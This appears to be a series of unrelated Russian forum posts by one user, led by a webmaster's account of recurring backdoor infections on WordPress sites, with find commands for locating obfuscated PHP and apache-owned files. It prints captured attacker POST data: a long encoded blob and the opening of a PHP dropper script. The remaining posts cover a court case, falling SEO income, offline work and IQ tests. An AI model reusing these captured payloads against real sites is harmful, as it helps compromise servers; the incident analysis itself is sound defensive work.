eveready

Сижу, никого не трогаю, примус сайты починяю.

Концы тянутся к 30.12-01.01 числам, увы логов уже не сохранилось. В эти числа были залиты бэкдоры, в системные файлы движка, тем и плагинов WP. Найти их у себя можно выполнив запрос в SSH:

find  -name "*.php" -exec grep -bH "                                                                " {} \;

(в первой строчке куча пробелов, после которых идет обфусцированный код).

В сегодняшних логах замечено следующее: 3-4 подряд post запроса. Первый - к залитому ранее дору (папка doc,journal и т.п.). В ответ 404. Следующий - к залитому ранее шеллу (exist.php и т.п. в корне) - ответ 404. И тогда уже к закладке залитой в указанные числа. После чего восстанавливается шелл в корне и всё начинается заново.

Что интересно. Свежий шелл создаётся с отличными от остальных файлов правами и от пользователя апач. Поэтому легко найти через ssh:

find -name "*.php" -user "apache" 

find -name "*.ico" -user "apache" 

Однако, что интересно - залитые в новый год закладки имеют права 777 и главное - пользователя root. Что хреновые мысли навевает по поводу источника заразы. Пароль рута сменил, ключ ssh ТП грохнул, хотя там в логах и чисто везде.

Пока всё почистил, 2 часа тихо. Наблюдаем.

Это было бы слишком просто. Не мой случай. Ломают даже голую "twentytwelve" на голом свежеобновлённом WP. За пару часов. Включил логирование POST запросов - шлётся некая белиберда к index.php вот такого вида:

xqrs=>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

Или вот такая:

a=>RC
p1=>if(!defined("PHP_EOL"))
{
    define("PHP_EOL", "\n");
}

if(!defined("DIRECTORY_SEPARATOR"))
{
    define("DIRECTORY_SEPARATOR", "/");
}

$payload_file = "PD9
далее обсфукция

Вероятно (не факт, т.к. время создания файла меняется) именно после этого в корне сайта появляется зловред - бэкдор, к которому идут уже другие пост запросы и закладки рассовываются по файлам. В общем уязвимость где-то на стыке апача (т.к. обнаружились незатёртые файлы сессий в папке php-tmp c <php echo "test"; ?> внутри) и WP. Пока не выяснил где именно.

У меня другая мысль появилась - ну это же идеальный хонейпот. Я отловил всего около 15 ip адресов, с которых идёт управление бэкдорами на моих сайтах. IP сейчас не дешевые, неужели никто централизованно/промышленно не борется с ботнетами отправляя их ип в бан? CloudFlare как оказалось пропускает их, зато мой динамический ип билайна всегда выхватывает их капчу.

То же самое: firstvds + centos. Куча сайтов на WP - каждый под своим пользователем. Все поломаны - в корне xml.php и куча зашифрованных php скриптов по папкам. Файлы зловредов создаются от пользователя apache. Задолбался вычищать уже. Несмотря на принятые заранее меры: чистый свежий WP, отключенный ftp, дополнительную авторизацию на файлы wp-login.php (через апач), удалённый xmlrpc.php...

Есть подозрение, что заливается каким-то (каким???) образом файл в mod-tmp (следы есть) и оттуда уже ползёт зараза дальше. Проверьте у кого такой же взлом.

При этом - есть пользователи, под которыми крутятся сайты без CMS, ну или на самописе - там чисто. Есть юзеры с файлами wp, но дропнутыми доменами, т.е. условно недоступными снаружи - тоже чисто.

Из чего делаю вывод - что ломают конкретно WP. Извне.

Разобрался кто с источником заразы?

---------- Добавлено 10.01.2018 в 16:59 ----------

Спасибо, почистил - искать по нику "Service"

Но вопрос открыт - где дырка?

Охренеть, такой чушью столько времени занимается наша Фемида. Тут не так давно был в суде по тяжким телесным, так за час-полтора всё закончилось.

Ingvarr, скорейшего завершения этого бреда

Увы, так и есть. Хотя, справедливости ради, самый главный гвоздь в гроб площадок любителей был забит не fb|kakprosto|syl, но баном со стороны ПС всех альтернативных контексту способов монетизации (ссылки, статьи, тизеры, платные архивы и всё остальное). А потом и контекст провалился на дно по доходности (и это при увеличении посещалки).

Если

Да сколько угодно их. В моём случае - монтаж гелиосистем (коллекторы, солнечные панели, их завязки с отоплением и автоматизация всего этого барахла). И вообще любая работа на стройке, отличная от "бери больше, кидай дальше", требующая хотя бы зачатков извилин, хорошо оплачивается. Промальп особо.

Примерно похожая ситуация.

В инете работаю (фриланс+на себя) с 2004 года. Разработка сайтов клиентам, продвижение (когда это было просто), программинг пхп и асп, доработки. Даже саттелито-генераторы писал. Прошел почти всё - от доргенов и клоакинга через ссылкоторговлю, арбитраж и тизеры к контексту.

Всё тлен. 8К хостов в 2006м приносили ощутимые деньги в РСЯ, сейчас - 12К того же траффика в РСЯ же - копейки на хостинг. Про остальное уже молчу.

В итоге, основной доход всё так же, как и в самом начале, приносит деятельность, далекая от онлайна. Однако клиентов нахожу через свой сайт. В итоге все эти знания, опыт оказались только потерей времени. 15 лет, да.

99% доменов дропнул, стал больше времени заниматься офлайном, доход увеличился, свободное время тоже.

Перспектив в старорежимных способах якобы "пассивного" заработка (контекст, статейники, доры, партнёрки) больше не вижу.

Перспективы есть в оффлайне, если вы, в своей локальной местности, можете предоставить эксклюзивную услугу или услугу высочайшего качества.

Вопрос в том, считаем ли мы вторую сигнальную систему тождественной языку? Куда тогда засунем "образное мышление", где образ не равен словам?

Хорошо, зайдем с другой стороны, раз никто так и не ответил, откуда появилась сама мысль, что язык первичен над интеллектом.

Тест IQ:

Какими словами вы приходите к верному ответу?

ЗЫ. Тест состоит из таких картинок чуть больше, чем полностью, при этом он, в общем, является общепринятым методом определения интеллекта.